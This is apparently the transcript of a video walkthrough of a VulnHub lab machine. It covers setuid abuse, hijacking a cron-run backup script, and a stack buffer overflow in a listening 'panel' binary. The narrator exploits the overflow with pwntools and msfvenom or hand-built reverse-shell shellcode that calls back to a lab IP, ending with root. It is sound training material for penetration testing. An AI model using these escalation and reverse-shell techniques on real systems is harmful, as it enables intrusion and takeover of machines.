it's pretty. And the reason I did temp is because normally dev SHM on Debian is set to no SUID. So we can mount grep no SUID and then grep SHM. And we see no sticky bits, or not sticky, SetUID bits are allowed on dev SHM. So that's why I'm doing it in temp. So we got SetUID.c, it's there, which GCC is there. So we should have everything in place to exploit this now. So we can do qsub 1, instead of touch owned, we can do gcc/temp shell.c, I think I called it, and then -o temp Pinky, because Pinky's who is going to own the file. Screen is the password. Temp shell.c doesn't exist. What is it? SetUID.c. Okay, we submitted it. So if we do ls-la on temp, we have Pinky. We don't have the SetUID bit yet set. So let's do this again and do chmod +s to set SetUID on temp Pinky. Screen. Then ls-la again. And now we have the SetUID bit set. So if we execute temp Pinky, actually before we do that, we can do ID and then execute temp Pinky and do ID again. We have our effective user ID as Pinky. So now we can go into Pinky's directory and we can see messages. If we cat messages, we'll probably see Pinky twice. Cat. It's a directory. Cat Stefano. And we can see all the who am I's. There's our A's that we had sent earlier. So we also have a bash history. So let's look at that. And we are editing backup.sh and user local bin. So user local bin, vi backup.sh, permission denied. If we do ls-la, we can see daemon owns it. Pinky is the group, and we are Pinky. But if we do an ID, our group is still Stefano. So we have to find a way to get our group set to Stefano. The easiest way is just to do ls-la in your home directory. We don't have a SSH, so I'm going to make dir.ssh. Then we're going to do VulnHub Pinky SSH-keygen -f. We'll name this IppSec. no passphrase on it, and we can just cat ippsec.pub. And we can make a authorized key file, so authorized underscore keys, paste our public key, ls-la, we see Pinky owns it, we can chmod that to 600, authorized keys, and then go back to my box, chmod 600 IppSec, and that is that SSH key we just generated, sh-i IppSec Pinky at PinkyDB. Port was 4655, I think, for SSH. And now when we do the ID, we have everything set. We're UID Pinky, GID Pinky. So if we go to user bin backup, or where was it? Cat bash history, user local bin. We can now view and edit backup. So we see we're doing a tar command to home daemon backup. Can we look at that? We don't have permission, but let's just edit this. So let's edit backup.sh, and we will do gcc temp setuid.c -o, and this will be temp daemon, then chmod plus s. See if that works. And if we just look at this again, temp setuid.c -o, that should be good. And then just wait some time. We could do the process monitor script. If we go in our log, can we edit anything in cron or look at cron? Less. Doesn't look like it. I don't even know what the cron log is. That's weird. V etc. So we can go to like var spool cron tabs. Can't list anything there. cd etc cat cron tab. Nothing really there. We could look at cron.whatever. There's a PHP in cron.d, so cron.d grep PHP. Just cleaning up the sessions. And periodically we'll just do ls-la on temp and see if any new files get created. So I'm going to pause the video because I know, spoiler alert, every 5 minutes. So instead of goofing around for 90 seconds, we'll just jump ahead. So I think it's been time. We can look. Oh, I've got 10 seconds left. Almost guessed that correctly. So do it ls-la on temp. As long as I wrote that file correctly, we should have something there. And we do. So daemon owns this shell. Execute this, do an ID. We're now very, very long, but we have effective user ID and group ID of daemon or daemon. I don't even know how to say that. We can go to his home directory. There is that backup. So if we do ls-la, his bash history is to null. So since other things were based upon user, what I did was a find / -type f user daemon to dev null. So it looks at looking at all the files that are owned by this user. And right off the bat, we have /daemon or daemon panel. So if we go to /daemon, do ls-la, we got a file, not a SetUID bit file. If we do file on it, it is an ELF. So if we execute it, error binding a socket, So it's doing something. So let's copy this over to a box. So panel, we probably don't have to do that. We can just ask CP it. LSLA, yeah, we own it. So, let's just base64 it. Good beginning of the line, space, copy a bunch of things. Then we can get rid of all these shells. And we can make a new directory. Actually, we want it in the RE directory. V panel.b64. That's not the right clipboard. That is base64-d panel, to panel, chmod plus x panel. And if we execute it, it just hangs, so we can netstat alnp grep panel. We see it's listening on port elite. So this is that binary that was listening on a network socket that or NMAP saw that we haven't looked into yet. You can nc localhost on that port. This is soon to be our backdoor. So let us reverse engineer this binary now. So let's get out of Radar on this instance. Okay. Then we can launch Radar and debug mode against panel. And if we do AAA, go in visualization mode, we can look at main and see what it's doing. So right off the bat, we have a fork, and Radar does not handle forks. Doesn't follow forks by default, so if we want to follow that, we'll have to set that option. I think it's follow.fork. Then we got socket, listen, bunch of socket options. That's binding, error to bind, listening. We accepted a packet, it looks like. Socket failed. And here we go. Here's our string of everything that's happening. So it's loading addresses. That's the welcome to daemon, soon be a backdoor. Sending that all. Then we're going to receive the message and then call sim.handle command. So let's go check what this is. If we go to handle command, where is that? Is that above? There it is. Whoops. Let's go back. VVV. Handle command, G twice, capital V. There we go. So let's see what's happening. We're adding RSP minus 80, so that is 16 times 8, 32 times 4, 128. So, guessing we're creating a buffer size of around 128 bytes. Maybe I'm wrong there, or what that's doing. And then calling str copy and strlen, which is not the end version, so there's probably a buffer overflow here. So, guess we can check it out. One thing I don't do with Radar is, we'll do it with both, but GDB, the check sec is nice in GDB. So let's do that first. Pinky, RE, GDB panel. See what things we have on. And I'm sure there's a way to do it in Radar easily. I'm just used to this. So all compile time protections are disabled. Canary, Fortify, NX, DEP, Pi, which is ASLR. Everything's disabled. So we don't have any compile time protections on this program. Forget how in Radar to say a command. Radar to help. Is it? grep E. I forget how to do options. I think it's E. Evaluate config variable. Yeah. So radar-2, we want to go debug-E. I want to say it's follow.fork equals true is the option. /panel. Not found. Radar2 follow fork. Maybe it's fork.follow. dbg.follow.child. Let's see. See. I think it's dbg follow child. Because SOAR is a fork. dbg.fork equals true? Nope. Dot follow fork? No. I guess we'll try child. Okay. If we now break on sim handle cmd, db, not b, we can run this, error binding the socket. What's listing on it? Do I have something? Q, netstat, alnp, grep, elite. We do. B killed S9, panel. We'll kill this twice for good measure. Quit out again. I probably could do like DO for restart it, but I just like reopening it. Okay. So when we get a command, it should break. So let's, whoops. NC localhost elite test. It did not. Child stopped. So that wasn't the correct one. So E env, that's my environment variable. Let's see. radar2 dbg dot follow. radar2 config file. Configuration variables. Fork. Follow. That's not a common one. Do we have which file it is in? E question mark. CFG. CFG.debug. Sorry for this. If this takes too much longer, I will do this offline and pause the video. Should be easy. radar2 RC. Fork. dbg.fork. Oh, I think I see it. I think it was plural. dbg.forks equals true. I think that's what I want. Q, yes. dbg.forks equals true. Analyze it so I can set my breakpoint. DC. I don't know why Siri thought I said her name. Okay. NC localhost. Refused. quit this out, pkill9 panel, pkill9 panel. Try this again. Analyze, breakpoint, continue until breakpoint, localhost 31337. Huh. If we get rid of the follow forks, DC, it runs, we get in, that's fine. Okay. We can do -e dbg.follow child equals true. Do we have to do both of those? AAA DB connection refused DC attach test. Okay, so I'm not sure what's going on. AAA DB sim dot handle CMD. It's going to complain. Oh, did I not need that frickin' and? Or the @ sign? Yeah, it was that @ sign that was screwing me up the whole time. I really got to figure out the use case for that. It's, I guess, just been too long and I can't think straight. But anyways, finally we hit the breakpoint. And oddly enough, it's a 32-bit register. And the reason it's this is I think it's because ASLR is disabled. For some reason, in 64-bit binaries, when it's compiled with the no pi flag, all memory registers go to 32-bit. And that's another shortcoming I'm going to have with Raider shortly. But we're at the breakpoint in handle CMD. If I could remember what I wanted to do, that would be great. So let's go back into visualization mode, go to handle CMD, and see what we wanted to do. Let's see. Oh, we wanted to send a long string of crap, like 100 bytes. That's what we wanted to do. Shoot. DC continue. Can we start? Yeah. That follow child thing. DB, DC. We'll do python-c print a times 128. We'll do 150. 150 A's. Let's send this to the socket. Hit breakpoint. We'll continue. And let's see. Pretty sure we crashed. Doesn't make that obvious. You know what? Let's just switch to GDB, who I'm familiar with. Raider is good, but still learning it. Let's just switch to what I know. So pkill9 to make sure it's dead, and then we can do gdb./panel, and this is going to go much smoother. So we can run this. We can if we wanted to, we could do info functions, I think, to list them. And we should see handle CMD somewhere there. Handle CMD is there. And we can see they're all 32-bit addresses. So if we want x/, let's say, 50 instructions of handle CMD, we're there. So if we want, we can set a breakpoint right at this return. So B, breakpoint set. We can run this. Its default behavior is to follow those childs or forks. Or forks, I think, not childs. Do that. We hit a breakpoint. And we can see, let's see, what do our registers look like? We're probably going to crash because RSP is all A's. We had clobbered that, RBP, so stack pointer, base pointer. And this return is going to return us to the stack pointer address, which is pointed to all A's. So if we do si sigsev, which is the seg fault. So we could do a jump call, or not yet. We have to pattern create first. So pattern create, and we can say 150. So let's do this again. We'll set the breakpoint for the... we don't have to set the breakpoint, I don't think. We can just run this and then crash it. So localhost, paste a bunch of crap, and we get that sigsev, and at RSP, this is the one we want to find where the location is. We can do pattern offset on that. We see at 120 bytes, we overwrite RSP, the stack pointer. So if we want, we can then start creating a skeleton exploit. So it's a 50-50 time, and I always get the split wrong on what I want to do. So vim, we'll go to RE first. Vim exploit.py, and we want to do from pwn import star to do pwn tools. Host port is equal to pinkydb. Oh, this is going to be localhost actually right now. Localhost and elite. So payload is equal to nothing. Payload equal a times 120. Then we got payload is equal to BBB. We'll do 8 B's to overwrite RSP with a bunch. Actually, a valid address. 1, 2, 4 zeros and 4 B's. That should be fine. Actually, it should be that, I think, because of little endian. And then after that, we can do payload equals C times 30. Okay, the next thing we have to do is create a socket to connect. So r equals remote host port r.receive until, and I think it said this in the output, and then r.send line payload. So let's quit, run again. Python exploit, sent. I don't think we crashed because I don't have plus equals. So we just sent it 30 C's. And it exited, so do this again, run. There we go. We crashed. And RSP is set to that, so we did overwrite where it's pointing to. Repeats 30 times. There's our C's. So have an overwrite, and we know we have to put some type of code here. So we can do a jump call to see if there's any like call ESPs, because we also know that how the stack pointer works is it's the start of a code that where RSP points to. So let's see if I can make something easy. So we have the stack, And right here, that's RSP. And then we're going to grow. And right here is the overwrite. So even though we're putting call RSP in the overwrite, we're not calling that one address. We're calling what was at the front of that, which is RSP, if that makes sense. So let's try that out. It's just like jump ESP and crap, 32-bit. But this time we're putting it actually in the RSP register instead of the RIP register, just because we're at a return. Let's see. Vim GDB. This is the window I was in. So vim exploit.py. We can say p64, that address. We don't need this in quotes. And let's see what happens. So Python exploit. And we crashed a little bit differently. And that's because we actually made that jump and then started flailing. So what we have to do is get some shellcode. And we only have 100 some bytes, 120. So if we do msf venom -l, I think -l will list payloads. See if msf venom has anything. While that runs, we can do Linux 64-bit reverse shellcode. Still running. Let's see, Windows, Linux, exploit DB. Zero sum 0x0. This is a really smart guy. I think he did a lot of the reversing of Eternal Blue when that all came around. But this finished, so let's try MSF Venom shellcode first. Search for Linux. We want Linux x64 shell reverse TCP. And we could try a bunch of these. But we can do -p lhost is equal to 172.16.10.168. lport is equal to, we'll say, 4444. -f for format is pi -o revshell dot shellcode. See if this works. Cat shell. We got a buff. So copy. We can paste this over into our exploit. And what we can do is payload is equal to buff. And then this is going to be the rev shell. Then this is going to be junk. So A times 120 minus the length of buff. And that's going to get us to the overwrite. And this is meaningless. We'll just get rid of it. So start this up, run it, exploit. We probably should have buff. Started a reverse shell. NCLVNP 444. See if anything happens. Run. That's why I was killing panel twice, to avoid that. So quit, run this, and we don't get a callback. So let's go check out this guy's stuff. You can click the video and stuff, but all we want is his GitHub. So let's see this. This is 127.0.0.1 encoded in hex. And in his post, we can actually explain why this is better than MSF Venoms. So this is super small shell code for reverse shell. It's 74 bytes. And Metasploit's version contains null bytes, which makes it not really useful in a lot of things. In order to remedy this, you can encode it to be 119 bytes. Actually, can we do that? We'll try that real quick. MSF Venom, we can say -B00. That should get rid of null bytes. See what the size is. If it's 119, we can try this again. 119. So let's try this again before we go to that. Just for my own curiosity. Wouldn't surprise me if this works, and that's why the size is exactly 1 byte more than this payload. So we can just run panel. Ugh. There's got to be a more elegant way to ensure that's dead. Still didn't work. Let's make sure we don't have any errors. Buff. So we can say, we'll just print the payload. Oh my god. That's why we're not crashing. And we do get a callback. Let's try without that encoding. MSF Venom without the bad characters. Would it have worked with this? Okay. Let's run it. Help if I'm listening. So no, that doesn't work. So it needs to have that -B for that. But if we didn't have 100 bytes and only had 77 or 85, because this shellcode is a bit more optimized, he just does the encoding against the IP in a more efficient way, I guess. We could try his code. So let's do that. And then that'll be the video. So we can find the code here. So let's just copy his whole SLAE. That course sounds familiar. Is that like Pentester Academy? I think that's Pentester Academy, or not Pentest it. Other certification place, big in the UK, not big in the UK, but it's is it UK? No, it's a French one, Italian one. I don't know. SLAE. We'll just see what that course is. Security Tube. Yeah, that's what that course. Git clone. Copy this. SLAE. You execute his shell builder script, and then you do -X for 64. we can do reverse shell dot ASM. And before we do that, we have to set our IP address. So let's vim reverse shell dot ASM. And here's our IP address. And we are 172.16.10.168. So we got to hex encode that. So this is little endian, so we start from the last octet and make our way left. So 168 in hex, that is A8. That's all lowercase. Then we do 10, which is A, so 0A. 16, that's 10. Well, that's confusing. And then 172 is not A, AC. That should be it. So now we can do Python shell build -x64 reverse shell dot ASM. ELF64. And it's -f, not x. And the file Python -x64 nasm -f elf64 -o. I wonder if I don't have a program, a dependency. Let's read me. Let's see, unable to open up output file. I think we want to be in this directory, and we python // shell build -x64 reverse shell ASM. There we go. And now we have the reverse shell code here. So let's see. Vim exploit buff is equal to our shellcode. It's not as pretty, but it should work. GDB, let's run this again. Python exploit.py. We are listening on 444. As long as I did the hex encoding, this should work. And there we go. So we got the reverse callback working. So now the only thing left to do is do this against Pinky. So it's working in our lab. So as long as everything's the same, which it should be, because we stayed within the binary for all memory addresses and ASLR is disabled, should all work. So vim exploit.py, and we'll change the host to be pinkydb. pinkydb. Python exploit.py. Get a callback, and we go to root, and we can cat root.txt because it's VulnHub. And that is the machine. I hope you guys enjoyed it. Take care, and I'll see you on Saturday for when the Hack the Box machine retires. Later.